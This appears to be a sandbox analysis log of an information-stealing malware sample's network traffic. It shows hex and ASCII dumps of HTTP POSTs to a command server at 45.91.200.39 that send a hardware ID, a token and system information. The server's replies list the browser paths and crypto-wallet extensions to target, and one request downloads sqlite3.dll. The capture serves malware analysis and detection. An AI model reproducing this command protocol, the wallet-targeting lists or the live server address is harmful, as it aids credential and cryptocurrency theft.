                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 38 31 33 30 44 37 38 38 45 43 32 32 37 33 38 34 38 33 30 38 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 2d 2d 0d 0a
                                                                                              Data Ascii: ------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="hwid"E68130D788EC2273848308------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="build"LogsDiller------AFCFHJJECAEHJJKEHIDB--
                                                                                              Oct 30, 2024 19:47:00.667704105 CET407INHTTP/1.1 200 OK
                                                                                              Date: Wed, 30 Oct 2024 18:47:00 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Length: 180
                                                                                              Keep-Alive: timeout=5, max=99
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Data Raw: 4e 6a 45 31 59 54 42 6c 4e 47 4e 6d 4e 7a 67 32 5a 44 59 77 4e 57 51 34 4d 7a 4a 69 4f 57 55 32 5a 6d 55 34 4d 57 4e 6c 5a 44 6b 30 4d 7a 68 6d 5a 47 4e 6c 4d 54 67 7a 4d 6a 59 78 4d 32 55 35 4e 54 42 6a 4e 54 59 78 4d 32 45 77 4f 44 59 77 5a 54 51 7a 4d 54 68 6b 5a 6a 56 68 4e 6a 6b 34 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                                                              Data Ascii: NjE1YTBlNGNmNzg2ZDYwNWQ4MzJiOWU2ZmU4MWNlZDk0MzhmZGNlMTgzMjYxM2U5NTBjNTYxM2EwODYwZTQzMThkZjVhNjk4fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDF8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
                                                                                              Oct 30, 2024 19:47:00.678425074 CET467OUTPOST /eaa194fa594ff9c2.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----DBKFIDAAEHIEGCBFIDBF
                                                                                              Host: 45.91.200.39
                                                                                              Content-Length: 268
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 2d 2d 0d 0a
                                                                                              Data Ascii: ------DBKFIDAAEHIEGCBFIDBFContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------DBKFIDAAEHIEGCBFIDBFContent-Disposition: form-data; name="message"browsers------DBKFIDAAEHIEGCBFIDBF--
                                                                                              Oct 30, 2024 19:47:00.914757967 CET1236INHTTP/1.1 200 OK
                                                                                              Date: Wed, 30 Oct 2024 18:47:00 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Length: 1520
                                                                                              Keep-Alive: timeout=5, max=98
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED]
                                                                                              Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
                                                                                              Oct 30, 2024 19:47:00.914849997 CET512INData Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32
                                                                                              Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
                                                                                              Oct 30, 2024 19:47:00.939768076 CET466OUTPOST /eaa194fa594ff9c2.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----JKFHIIEHIEGDHJJJKFII
                                                                                              Host: 45.91.200.39
                                                                                              Content-Length: 267
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 2d 2d 0d 0a
                                                                                              Data Ascii: ------JKFHIIEHIEGDHJJJKFIIContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------JKFHIIEHIEGDHJJJKFIIContent-Disposition: form-data; name="message"plugins------JKFHIIEHIEGDHJJJKFII--
                                                                                              Oct 30, 2024 19:47:01.176774025 CET1236INHTTP/1.1 200 OK
                                                                                              Date: Wed, 30 Oct 2024 18:47:01 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Length: 7116
                                                                                              Keep-Alive: timeout=5, max=97
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                              Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                                              Oct 30, 2024 19:47:01.176826000 CET212INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                              Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8
                                                                                              Oct 30, 2024 19:47:01.176884890 CET1236INData Raw: 5a 6d 68 74 5a 6d 56 75 5a 47 64 6b 62 32 4e 74 59 32 4a 74 5a 6d 6c 72 5a 47 4e 76 5a 32 39 6d 63 47 68 70 62 57 35 72 62 6d 39 38 4d 58 77 77 66 44 42 38 51 58 56 79 62 79 42 58 59 57 78 73 5a 58 51 6f 54 57 6c 75 59 53 42 51 63 6d 39 30 62 32
                                                                                              Data Ascii: ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHxmbHBpY2lpbGVtZ2hibWZ
                                                                                              Oct 30, 2024 19:47:01.176920891 CET1236INData Raw: 64 48 78 6b 61 32 52 6c 5a 47 78 77 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d 6c 6c 59 57 31 6d 61 32 78 72 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d
                                                                                              Data Ascii: dHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGp
                                                                                              Oct 30, 2024 19:47:01.176955938 CET1236INData Raw: 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 6d 70 69 62 47 31 71 66 44 46 38 4d 48 77 77 66 45 78 6c 59 58
                                                                                              Data Ascii: bmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGh
                                                                                              Oct 30, 2024 19:47:01.176991940 CET1236INData Raw: 64 57 78 30 66 47 6c 6e 61 33 42 6a 62 32 52 6f 61 57 56 76 62 58 42 6c 62 47 39 75 59 32 5a 75 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32
                                                                                              Data Ascii: dWx0fGlna3Bjb2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWp
                                                                                              Oct 30, 2024 19:47:01.177028894 CET952INData Raw: 4d 48 78 49 51 56 5a 42 53 43 42 58 59 57 78 73 5a 58 52 38 59 32 35 75 59 32 31 6b 61 47 70 68 59 33 42 72 62 57 70 74 61 32 4e 68 5a 6d 4e 6f 63 48 42 69 62 6e 42 75 61 47 52 74 62 32 35 38 4d 58 77 77 66 44 42 38 52 57 78 73 61 53 41 74 49 46
                                                                                              Data Ascii: MHxIQVZBSCBXYWxsZXR8Y25uY21kaGphY3BrbWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWxsaSAtIFN1aSBXYWxsZXR8b2NqZHBtb2FsbG1nbWpiYm9nZmlpYW9mcGhiamdjaGh8MXwwfDB8VmVub20gV2FsbGV0fG9qZ2dtY2hsZ2huamxhcG1mYm5qaG9sZmpraWlkYmNofDF8MHwwfFB1bHNlIFdhbGxldCBDaHJvbWl
                                                                                              Oct 30, 2024 19:47:01.179101944 CET467OUTPOST /eaa194fa594ff9c2.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----GHIDGDHCGCBAKFHIIIII
                                                                                              Host: 45.91.200.39
                                                                                              Content-Length: 268
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 2d 2d 0d 0a
                                                                                              Data Ascii: ------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="message"fplugins------GHIDGDHCGCBAKFHIIIII--
                                                                                              Oct 30, 2024 19:47:01.432435036 CET335INHTTP/1.1 200 OK
                                                                                              Date: Wed, 30 Oct 2024 18:47:01 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Length: 108
                                                                                              Keep-Alive: timeout=5, max=96
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                              Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                              Oct 30, 2024 19:47:01.452884912 CET200OUTPOST /eaa194fa594ff9c2.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFB
                                                                                              Host: 45.91.200.39
                                                                                              Content-Length: 5199
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Oct 30, 2024 19:47:01.452927113 CET5199OUTData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65
                                                                                              Data Ascii: ------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                              Oct 30, 2024 19:47:02.064091921 CET202INHTTP/1.1 200 OK
                                                                                              Date: Wed, 30 Oct 2024 18:47:01 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 0
                                                                                              Keep-Alive: timeout=5, max=95
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Oct 30, 2024 19:47:02.333699942 CET91OUTGET /cb9cc10e175e1537/sqlite3.dll HTTP/1.1
                                                                                              Host: 45.91.200.39
                                                                                              Cache-Control: no-cache
                                                                                              Oct 30, 2024 19:47:02.568988085 CET1236INHTTP/1.1 200 OK
                                                                                              Date: Wed, 30 Oct 2024 18:47:02 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
                                                                                              ETag: "10e436-5e7eeebed8d80"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 1106998
                                                                                              Content-Type: application/x-msdos-program
                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                                              Oct 30, 2024 19:47:02.569039106 CET1236INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                                              Data Ascii: #N@B/81s:<R@B/92P @B
                                                                                              Oct 30, 2024 19:47:02.569076061 CET1236INData Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26
                                                                                              Data Ascii: tu.|$\$4$|$\$4$du1Hga[^_]&+C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q
                                                                                              Oct 30, 2024 19:47:06.569233894 CET200OUTPOST /eaa194fa594ff9c2.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAA
                                                                                              Host: 45.91.200.39
                                                                                              Content-Length: 1451
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Oct 30, 2024 19:47:06.872137070 CET202INHTTP/1.1 200 OK
                                                                                              Date: Wed, 30 Oct 2024 18:47:06 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 0
                                                                                              Keep-Alive: timeout=5, max=93
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
